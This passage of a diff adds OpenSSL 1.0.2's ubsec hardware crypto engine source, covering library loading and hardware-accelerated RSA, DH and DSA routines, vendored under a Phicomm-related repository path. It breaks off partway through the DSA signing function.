+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.c
@@ -0,0 +1,1085 @@
+/* crypto/engine/hw_ubsec.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000. Cloned shamelessly by Joe Tardo.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_UBSEC
+
+#  ifdef FLAT_INC
+#   include "hw_ubsec.h"
+#  else
+#   include "vendor_defns/hw_ubsec.h"
+#  endif
+
+#  define UBSEC_LIB_NAME "ubsec engine"
+#  include "e_ubsec_err.c"
+
+#  define FAIL_TO_SOFTWARE -15
+
+static int ubsec_destroy(ENGINE *e);
+static int ubsec_init(ENGINE *e);
+static int ubsec_finish(ENGINE *e);
+static int ubsec_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+static int ubsec_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx);
+#  ifndef OPENSSL_NO_RSA
+static int ubsec_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *q, const BIGNUM *dp,
+                             const BIGNUM *dq, const BIGNUM *qinv,
+                             BN_CTX *ctx);
+static int ubsec_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                             BN_CTX *ctx);
+static int ubsec_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx);
+#  endif
+#  ifndef OPENSSL_NO_DSA
+#   ifdef NOT_USED
+static int ubsec_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                             BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                             BN_CTX *ctx, BN_MONT_CTX *in_mont);
+static int ubsec_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                             const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx);
+#   endif
+static DSA_SIG *ubsec_dsa_do_sign(const unsigned char *dgst, int dlen,
+                                  DSA *dsa);
+static int ubsec_dsa_verify(const unsigned char *dgst, int dgst_len,
+                            DSA_SIG *sig, DSA *dsa);
+#  endif
+#  ifndef OPENSSL_NO_DH
+static int ubsec_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                            const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                            BN_MONT_CTX *m_ctx);
+static int ubsec_dh_compute_key(unsigned char *key, const BIGNUM *pub_key,
+                                DH *dh);
+static int ubsec_dh_generate_key(DH *dh);
+#  endif
+
+#  ifdef NOT_USED
+static int ubsec_rand_bytes(unsigned char *buf, int num);
+static int ubsec_rand_status(void);
+#  endif
+
+#  define UBSEC_CMD_SO_PATH               ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN ubsec_cmd_defns[] = {
+    {UBSEC_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'ubsec' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD ubsec_rsa = {
+    "UBSEC RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    ubsec_rsa_mod_exp,
+    ubsec_mod_exp_mont,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* Our internal DSA_METHOD that we provide pointers to */
+static DSA_METHOD ubsec_dsa = {
+    "UBSEC DSA method",
+    ubsec_dsa_do_sign,          /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    ubsec_dsa_verify,           /* dsa_do_verify */
+    NULL,                       /* ubsec_dsa_mod_exp *//* dsa_mod_exp */
+    NULL,                       /* ubsec_mod_exp_dsa *//* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* dsa_paramgen */
+    NULL                        /* dsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD ubsec_dh = {
+    "UBSEC DH method",
+    ubsec_dh_generate_key,
+    ubsec_dh_compute_key,
+    ubsec_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_ubsec_id = "ubsec";
+static const char *engine_ubsec_name = "UBSEC hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_ubsec() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DH
+#   ifndef HAVE_UBSEC_DH
+    const DH_METHOD *meth3;
+#   endif                       /* HAVE_UBSEC_DH */
+#  endif
+    if (!ENGINE_set_id(e, engine_ubsec_id) ||
+        !ENGINE_set_name(e, engine_ubsec_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &ubsec_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &ubsec_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &ubsec_dh) ||
+#  endif
+        !ENGINE_set_destroy_function(e, ubsec_destroy) ||
+        !ENGINE_set_init_function(e, ubsec_init) ||
+        !ENGINE_set_finish_function(e, ubsec_finish) ||
+        !ENGINE_set_ctrl_function(e, ubsec_ctrl) ||
+        !ENGINE_set_cmd_defns(e, ubsec_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * Broadcom-specific mod_exp and mod_exp_crt so we use those functions.
+     * NB: We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    ubsec_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    ubsec_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    ubsec_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    ubsec_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+#   ifndef HAVE_UBSEC_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    ubsec_dh.generate_key = meth3->generate_key;
+    ubsec_dh.compute_key = meth3->compute_key;
+#   endif                       /* HAVE_UBSEC_DH */
+#  endif
+
+    /* Ensure the ubsec error handling is set up */
+    ERR_load_UBSEC_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_ubsec(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_ubsec(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_ubsec();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * UBSEC library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+
+static DSO *ubsec_dso = NULL;
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+
+static t_UBSEC_ubsec_bytes_to_bits *p_UBSEC_ubsec_bytes_to_bits = NULL;
+static t_UBSEC_ubsec_bits_to_bytes *p_UBSEC_ubsec_bits_to_bytes = NULL;
+static t_UBSEC_ubsec_open *p_UBSEC_ubsec_open = NULL;
+static t_UBSEC_ubsec_close *p_UBSEC_ubsec_close = NULL;
+#  ifndef OPENSSL_NO_DH
+static t_UBSEC_diffie_hellman_generate_ioctl
+    * p_UBSEC_diffie_hellman_generate_ioctl = NULL;
+static t_UBSEC_diffie_hellman_agree_ioctl *p_UBSEC_diffie_hellman_agree_ioctl
+    = NULL;
+#  endif
+#  ifndef OPENSSL_NO_RSA
+static t_UBSEC_rsa_mod_exp_ioctl *p_UBSEC_rsa_mod_exp_ioctl = NULL;
+static t_UBSEC_rsa_mod_exp_crt_ioctl *p_UBSEC_rsa_mod_exp_crt_ioctl = NULL;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+static t_UBSEC_dsa_sign_ioctl *p_UBSEC_dsa_sign_ioctl = NULL;
+static t_UBSEC_dsa_verify_ioctl *p_UBSEC_dsa_verify_ioctl = NULL;
+#  endif
+static t_UBSEC_math_accelerate_ioctl *p_UBSEC_math_accelerate_ioctl = NULL;
+static t_UBSEC_rng_ioctl *p_UBSEC_rng_ioctl = NULL;
+static t_UBSEC_max_key_len_ioctl *p_UBSEC_max_key_len_ioctl = NULL;
+
+static int max_key_len = 1024;  /* ??? */
+
+/*
+ * These are the static string constants for the DSO file name and the function
+ * symbol names to bind to.
+ */
+
+static const char *UBSEC_LIBNAME = NULL;
+static const char *get_UBSEC_LIBNAME(void)
+{
+    if (UBSEC_LIBNAME)
+        return UBSEC_LIBNAME;
+    return "ubsec";
+}
+
+static void free_UBSEC_LIBNAME(void)
+{
+    if (UBSEC_LIBNAME)
+        OPENSSL_free((void *)UBSEC_LIBNAME);
+    UBSEC_LIBNAME = NULL;
+}
+
+static long set_UBSEC_LIBNAME(const char *name)
+{
+    free_UBSEC_LIBNAME();
+    return (((UBSEC_LIBNAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+static const char *UBSEC_F1 = "ubsec_bytes_to_bits";
+static const char *UBSEC_F2 = "ubsec_bits_to_bytes";
+static const char *UBSEC_F3 = "ubsec_open";
+static const char *UBSEC_F4 = "ubsec_close";
+#  ifndef OPENSSL_NO_DH
+static const char *UBSEC_F5 = "diffie_hellman_generate_ioctl";
+static const char *UBSEC_F6 = "diffie_hellman_agree_ioctl";
+#  endif
+/* #ifndef OPENSSL_NO_RSA */
+static const char *UBSEC_F7 = "rsa_mod_exp_ioctl";
+static const char *UBSEC_F8 = "rsa_mod_exp_crt_ioctl";
+/* #endif */
+#  ifndef OPENSSL_NO_DSA
+static const char *UBSEC_F9 = "dsa_sign_ioctl";
+static const char *UBSEC_F10 = "dsa_verify_ioctl";
+#  endif
+static const char *UBSEC_F11 = "math_accelerate_ioctl";
+static const char *UBSEC_F12 = "rng_ioctl";
+static const char *UBSEC_F13 = "ubsec_max_key_len_ioctl";
+
+/* Destructor (complements the "ENGINE_ubsec()" constructor) */
+static int ubsec_destroy(ENGINE *e)
+{
+    free_UBSEC_LIBNAME();
+    ERR_unload_UBSEC_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int ubsec_init(ENGINE *e)
+{
+    t_UBSEC_ubsec_bytes_to_bits *p1;
+    t_UBSEC_ubsec_bits_to_bytes *p2;
+    t_UBSEC_ubsec_open *p3;
+    t_UBSEC_ubsec_close *p4;
+#  ifndef OPENSSL_NO_DH
+    t_UBSEC_diffie_hellman_generate_ioctl *p5;
+    t_UBSEC_diffie_hellman_agree_ioctl *p6;
+#  endif
+/* #ifndef OPENSSL_NO_RSA */
+    t_UBSEC_rsa_mod_exp_ioctl *p7;
+    t_UBSEC_rsa_mod_exp_crt_ioctl *p8;
+/* #endif */
+#  ifndef OPENSSL_NO_DSA
+    t_UBSEC_dsa_sign_ioctl *p9;
+    t_UBSEC_dsa_verify_ioctl *p10;
+#  endif
+    t_UBSEC_math_accelerate_ioctl *p11;
+    t_UBSEC_rng_ioctl *p12;
+    t_UBSEC_max_key_len_ioctl *p13;
+    int fd = 0;
+
+    if (ubsec_dso != NULL) {
+        UBSECerr(UBSEC_F_UBSEC_INIT, UBSEC_R_ALREADY_LOADED);
+        goto err;
+    }
+    /*
+     * Attempt to load libubsec.so/ubsec.dll/whatever.
+     */
+    ubsec_dso = DSO_load(NULL, get_UBSEC_LIBNAME(), NULL, 0);
+    if (ubsec_dso == NULL) {
+        UBSECerr(UBSEC_F_UBSEC_INIT, UBSEC_R_DSO_FAILURE);
+        goto err;
+    }
+
+    if (!(p1 = (t_UBSEC_ubsec_bytes_to_bits *)
+          DSO_bind_func(ubsec_dso, UBSEC_F1))
+        || !(p2 = (t_UBSEC_ubsec_bits_to_bytes *)
+             DSO_bind_func(ubsec_dso, UBSEC_F2))
+        || !(p3 = (t_UBSEC_ubsec_open *)
+             DSO_bind_func(ubsec_dso, UBSEC_F3))
+        || !(p4 = (t_UBSEC_ubsec_close *)
+             DSO_bind_func(ubsec_dso, UBSEC_F4))
+#  ifndef OPENSSL_NO_DH
+        || !(p5 = (t_UBSEC_diffie_hellman_generate_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F5))
+        || !(p6 = (t_UBSEC_diffie_hellman_agree_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F6))
+#  endif
+/* #ifndef OPENSSL_NO_RSA */
+        || !(p7 = (t_UBSEC_rsa_mod_exp_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F7))
+        || !(p8 = (t_UBSEC_rsa_mod_exp_crt_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F8))
+/* #endif */
+#  ifndef OPENSSL_NO_DSA
+        || !(p9 = (t_UBSEC_dsa_sign_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F9))
+        || !(p10 = (t_UBSEC_dsa_verify_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F10))
+#  endif
+        || !(p11 = (t_UBSEC_math_accelerate_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F11))
+        || !(p12 = (t_UBSEC_rng_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F12))
+        || !(p13 = (t_UBSEC_max_key_len_ioctl *)
+             DSO_bind_func(ubsec_dso, UBSEC_F13))) {
+        UBSECerr(UBSEC_F_UBSEC_INIT, UBSEC_R_DSO_FAILURE);
+        goto err;
+    }
+
+    /* Copy the pointers */
+    p_UBSEC_ubsec_bytes_to_bits = p1;
+    p_UBSEC_ubsec_bits_to_bytes = p2;
+    p_UBSEC_ubsec_open = p3;
+    p_UBSEC_ubsec_close = p4;
+#  ifndef OPENSSL_NO_DH
+    p_UBSEC_diffie_hellman_generate_ioctl = p5;
+    p_UBSEC_diffie_hellman_agree_ioctl = p6;
+#  endif
+#  ifndef OPENSSL_NO_RSA
+    p_UBSEC_rsa_mod_exp_ioctl = p7;
+    p_UBSEC_rsa_mod_exp_crt_ioctl = p8;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    p_UBSEC_dsa_sign_ioctl = p9;
+    p_UBSEC_dsa_verify_ioctl = p10;
+#  endif
+    p_UBSEC_math_accelerate_ioctl = p11;
+    p_UBSEC_rng_ioctl = p12;
+    p_UBSEC_max_key_len_ioctl = p13;
+
+    /* Perform an open to see if there's actually any unit running. */
+    if (((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) > 0)
+        && (p_UBSEC_max_key_len_ioctl(fd, &max_key_len) == 0)) {
+        p_UBSEC_ubsec_close(fd);
+        return 1;
+    } else {
+        UBSECerr(UBSEC_F_UBSEC_INIT, UBSEC_R_UNIT_FAILURE);
+    }
+
+ err:
+    if (ubsec_dso)
+        DSO_free(ubsec_dso);
+    ubsec_dso = NULL;
+    p_UBSEC_ubsec_bytes_to_bits = NULL;
+    p_UBSEC_ubsec_bits_to_bytes = NULL;
+    p_UBSEC_ubsec_open = NULL;
+    p_UBSEC_ubsec_close = NULL;
+#  ifndef OPENSSL_NO_DH
+    p_UBSEC_diffie_hellman_generate_ioctl = NULL;
+    p_UBSEC_diffie_hellman_agree_ioctl = NULL;
+#  endif
+#  ifndef OPENSSL_NO_RSA
+    p_UBSEC_rsa_mod_exp_ioctl = NULL;
+    p_UBSEC_rsa_mod_exp_crt_ioctl = NULL;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    p_UBSEC_dsa_sign_ioctl = NULL;
+    p_UBSEC_dsa_verify_ioctl = NULL;
+#  endif
+    p_UBSEC_math_accelerate_ioctl = NULL;
+    p_UBSEC_rng_ioctl = NULL;
+    p_UBSEC_max_key_len_ioctl = NULL;
+
+    return 0;
+}
+
+static int ubsec_finish(ENGINE *e)
+{
+    free_UBSEC_LIBNAME();
+    if (ubsec_dso == NULL) {
+        UBSECerr(UBSEC_F_UBSEC_FINISH, UBSEC_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(ubsec_dso)) {
+        UBSECerr(UBSEC_F_UBSEC_FINISH, UBSEC_R_DSO_FAILURE);
+        return 0;
+    }
+    ubsec_dso = NULL;
+    p_UBSEC_ubsec_bytes_to_bits = NULL;
+    p_UBSEC_ubsec_bits_to_bytes = NULL;
+    p_UBSEC_ubsec_open = NULL;
+    p_UBSEC_ubsec_close = NULL;
+#  ifndef OPENSSL_NO_DH
+    p_UBSEC_diffie_hellman_generate_ioctl = NULL;
+    p_UBSEC_diffie_hellman_agree_ioctl = NULL;
+#  endif
+#  ifndef OPENSSL_NO_RSA
+    p_UBSEC_rsa_mod_exp_ioctl = NULL;
+    p_UBSEC_rsa_mod_exp_crt_ioctl = NULL;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    p_UBSEC_dsa_sign_ioctl = NULL;
+    p_UBSEC_dsa_verify_ioctl = NULL;
+#  endif
+    p_UBSEC_math_accelerate_ioctl = NULL;
+    p_UBSEC_rng_ioctl = NULL;
+    p_UBSEC_max_key_len_ioctl = NULL;
+    return 1;
+}
+
+static int ubsec_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int initialised = ((ubsec_dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case UBSEC_CMD_SO_PATH:
+        if (p == NULL) {
+            UBSECerr(UBSEC_F_UBSEC_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            UBSECerr(UBSEC_F_UBSEC_CTRL, UBSEC_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_UBSEC_LIBNAME((const char *)p);
+    default:
+        break;
+    }
+    UBSECerr(UBSEC_F_UBSEC_CTRL, UBSEC_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int ubsec_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx)
+{
+    int y_len = 0;
+    int fd;
+
+    if (ubsec_dso == NULL) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP, UBSEC_R_NOT_LOADED);
+        return 0;
+    }
+
+    /* Check if hardware can't handle this argument. */
+    y_len = BN_num_bits(m);
+    if (y_len > max_key_len) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP, UBSEC_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    if (!bn_wexpand(r, m->top)) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP, UBSEC_R_BN_EXPAND_FAIL);
+        return 0;
+    }
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        fd = 0;
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP, UBSEC_R_UNIT_FAILURE);
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    if (p_UBSEC_rsa_mod_exp_ioctl(fd, (unsigned char *)a->d, BN_num_bits(a),
+                                  (unsigned char *)m->d, BN_num_bits(m),
+                                  (unsigned char *)p->d, BN_num_bits(p),
+                                  (unsigned char *)r->d, &y_len) != 0) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+
+        return BN_mod_exp(r, a, p, m, ctx);
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    r->top = (BN_num_bits(m) + BN_BITS2 - 1) / BN_BITS2;
+    return 1;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static int ubsec_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                             BN_CTX *ctx)
+{
+    int to_return = 0;
+
+    if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+        UBSECerr(UBSEC_F_UBSEC_RSA_MOD_EXP, UBSEC_R_MISSING_KEY_COMPONENTS);
+        goto err;
+    }
+
+    to_return = ubsec_mod_exp_crt(r0, I, rsa->p, rsa->q, rsa->dmp1,
+                                  rsa->dmq1, rsa->iqmp, ctx);
+    if (to_return == FAIL_TO_SOFTWARE) {
+        /*
+         * Do in software as hardware failed.
+         */
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        to_return = (*meth->rsa_mod_exp) (r0, I, rsa, ctx);
+    }
+ err:
+    return to_return;
+}
+
+static int ubsec_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *q, const BIGNUM *dp,
+                             const BIGNUM *dq, const BIGNUM *qinv,
+                             BN_CTX *ctx)
+{
+    int y_len, fd;
+
+    y_len = BN_num_bits(p) + BN_num_bits(q);
+
+    /* Check if hardware can't handle this argument. */
+    if (y_len > max_key_len) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP_CRT,
+                 UBSEC_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return FAIL_TO_SOFTWARE;
+    }
+
+    if (!bn_wexpand(r, p->top + q->top + 1)) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP_CRT, UBSEC_R_BN_EXPAND_FAIL);
+        return 0;
+    }
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        fd = 0;
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP_CRT, UBSEC_R_UNIT_FAILURE);
+        return FAIL_TO_SOFTWARE;
+    }
+
+    if (p_UBSEC_rsa_mod_exp_crt_ioctl(fd,
+                                      (unsigned char *)a->d, BN_num_bits(a),
+                                      (unsigned char *)qinv->d,
+                                      BN_num_bits(qinv),
+                                      (unsigned char *)dp->d, BN_num_bits(dp),
+                                      (unsigned char *)p->d, BN_num_bits(p),
+                                      (unsigned char *)dq->d, BN_num_bits(dq),
+                                      (unsigned char *)q->d, BN_num_bits(q),
+                                      (unsigned char *)r->d, &y_len) != 0) {
+        UBSECerr(UBSEC_F_UBSEC_MOD_EXP_CRT, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+        return FAIL_TO_SOFTWARE;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    r->top = (BN_num_bits(p) + BN_num_bits(q) + BN_BITS2 - 1) / BN_BITS2;
+    return 1;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+#   ifdef NOT_USED
+static int ubsec_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                             BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                             BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!ubsec_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!ubsec_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static int ubsec_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                             const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx)
+{
+    return ubsec_mod_exp(r, a, p, m, ctx);
+}
+#   endif
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+
+/*
+ * This function is aliased to mod_exp (with the mont stuff dropped).
+ */
+static int ubsec_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx)
+{
+    int ret = 0;
+
+    /* Do in software if the key is too large for the hardware. */
+    if (BN_num_bits(m) > max_key_len) {
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        ret = (*meth->bn_mod_exp) (r, a, p, m, ctx, m_ctx);
+    } else {
+        ret = ubsec_mod_exp(r, a, p, m, ctx);
+    }
+
+    return ret;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int ubsec_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                            const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                            BN_MONT_CTX *m_ctx)
+{
+    return ubsec_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+static DSA_SIG *ubsec_dsa_do_sign(const unsigned char *dgst, int dlen,
+                                  DSA *dsa)
+{
+    DSA_SIG *to_return = NULL;
+    int s_len = 160, r_len = 160, d_len, fd;
+    BIGNUM m, *r = NULL, *s = NULL;
+
+    BN_init(&m);
+
+    s = BN_new();
+    r = BN_new();
+    if ((s == NULL) || (r == NULL))
+        goto err;
+
+    d_len = p_UBSEC_ubsec_bytes_to_bits((unsigned char *)dgst, dlen);
+
+    if (!bn_wexpand(r, (160 + BN_BITS2 - 1) / BN_BITS2) ||
+        (!bn_wexpand(s, (160 + BN_BITS2 - 1) / BN_BITS2))) {
+        UBSECerr(UBSEC_F_UBSEC_DSA_DO_SIGN, UBSEC_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    if (BN_bin2bn(dgst, dlen, &m) == NULL) {
+        UBSECerr(UBSEC_F_UBSEC_DSA_DO_SIGN, UBSEC_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        const DSA_METHOD *meth;
+        fd = 0;
+        UBSECerr(UBSEC_F_UBSEC_DSA_DO_SIGN, UBSEC_R_UNIT_FAILURE);
+        meth = DSA_OpenSSL();
+        to_return = meth->dsa_do_sign(dgst, dlen, dsa);
